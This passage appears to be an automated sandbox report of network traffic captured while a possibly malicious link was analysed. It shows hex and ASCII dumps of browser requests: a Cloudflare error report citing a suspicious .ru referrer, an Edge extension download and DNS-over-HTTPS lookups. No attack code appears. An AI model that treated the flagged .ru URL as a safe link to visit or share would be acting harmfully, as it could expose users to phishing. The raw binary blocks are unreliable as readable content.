                                                                                                                                                                                    2025-01-09 14:29:45 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                                                    Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    5192.168.2.44975435.190.80.14435664C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:29:45 UTC478OUTPOST /report/v4?s=RCVyA2PmCfeA6ON61TEjBpw%2Fm12h53FjdAjxb4FjBGXqwn1FWtJRvY1aQKGCLi3Cy6IY8gvA3is%2Fk8cLz1KQGXWbMe0zkt6QAiJf%2Ftxe%2FQyWZveMmFngujKg7zpljg%3D%3D HTTP/1.1
                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 433
                                                                                                                                                                                    Content-Type: application/reports+json
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2025-01-09 14:29:45 UTC433OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 31 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 62 72 79 66 2e 61 74 63 68 69 72 6c 69 73 63 2e 72 75 2f 45 65 4d 41 47 76 49 65 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 30 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f
                                                                                                                                                                                    Data Ascii: [{"age":0,"body":{"elapsed_time":119,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://bryf.atchirlisc.ru/EeMAGvIe/","sampling_fraction":1.0,"server_ip":"104.21.80.1","status_code":404,"type":"http.error"},"type":"network-erro
                                                                                                                                                                                    2025-01-09 14:29:45 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    date: Thu, 09 Jan 2025 14:29:45 GMT
                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    6192.168.2.449790142.250.186.1294437040C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:30:06 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                    Host: clients2.googleusercontent.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                    2025-01-09 14:30:06 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC6CCDs3O85rvq1eyKFrqcVDqa0zXr7M3HQibbTO4mu2hMZvb7vwmwrwWOpNfVSmtuBQ
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Content-Length: 154477
                                                                                                                                                                                    X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Date: Wed, 08 Jan 2025 15:58:13 GMT
                                                                                                                                                                                    Expires: Thu, 08 Jan 2026 15:58:13 GMT
                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                    Age: 81113
                                                                                                                                                                                    Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                    ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                    Content-Type: application/x-chrome-extension
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2025-01-09 14:30:06 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                    Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                    2025-01-09 14:30:06 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                                                    Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                    2025-01-09 14:30:06 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
                                                                                                                                                                                    Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                    2025-01-09 14:30:06 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                    Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                                                    2025-01-09 14:30:06 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                    Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                    2025-01-09 14:30:06 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                    Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                    2025-01-09 14:30:06 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                    Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                    2025-01-09 14:30:06 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                    Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                    2025-01-09 14:30:06 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                    Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                    2025-01-09 14:30:06 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                    Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    7192.168.2.449803172.64.41.34437040C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:30:08 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    2025-01-09 14:30:08 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                    2025-01-09 14:30:08 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    Date: Thu, 09 Jan 2025 14:30:08 GMT
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                    CF-RAY: 8ff51fa0aeb78c1b-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2025-01-09 14:30:08 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 0a 00 04 8e fa 50 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: wwwgstaticcomP)


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    8192.168.2.449804172.64.41.34437040C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:30:08 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    2025-01-09 14:30:08 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                    2025-01-09 14:30:08 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    Date: Thu, 09 Jan 2025 14:30:08 GMT
                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                    CF-RAY: 8ff51fa09cdc42d2-EWR
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2025-01-09 14:30:08 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 24 00 04 8e fb 28 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: wwwgstaticcom$()


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    9192.168.2.449805162.159.61.34437040C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2025-01-09 14:30:08 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                    Content-Type: application/dns-message
